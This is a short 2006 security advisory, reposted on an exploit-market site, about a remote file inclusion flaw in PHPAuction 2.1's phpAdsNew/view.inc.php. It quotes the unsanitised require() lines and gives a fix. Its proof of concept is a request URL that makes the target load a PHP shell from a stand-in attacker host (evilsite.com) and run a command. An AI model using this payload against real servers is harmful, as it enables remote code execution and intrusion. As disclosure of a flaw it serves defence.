[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPAuction 2.1 (phpAds_path) Remote File Inclusion Vulnerability

Author
Philipp Niedziela
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-627
Category
web applications
Date add
31-07-2006
Platform
unsorted
================================================================
PHPAuction 2.1 (phpAds_path) Remote File Inclusion Vulnerability
================================================================



+--------------------------------------------------------------------
+
+ PHPAuction 2.1 Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPAuction 2.1 (maybe higher)
+ Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+
+--------------------------------------------------------------------
+
+ Code /phpAdsNew/view.inc.php:
+
+ .....
+ // Include required files
+ require ("$phpAds_path/dblib.php");
+ require ("$phpAds_path/lib-expire.inc.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $phpAds_path is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $phpAds_path before using.
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/dblib.php/index.html
+
+ http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------





#  0day.today [2024-12-24]  #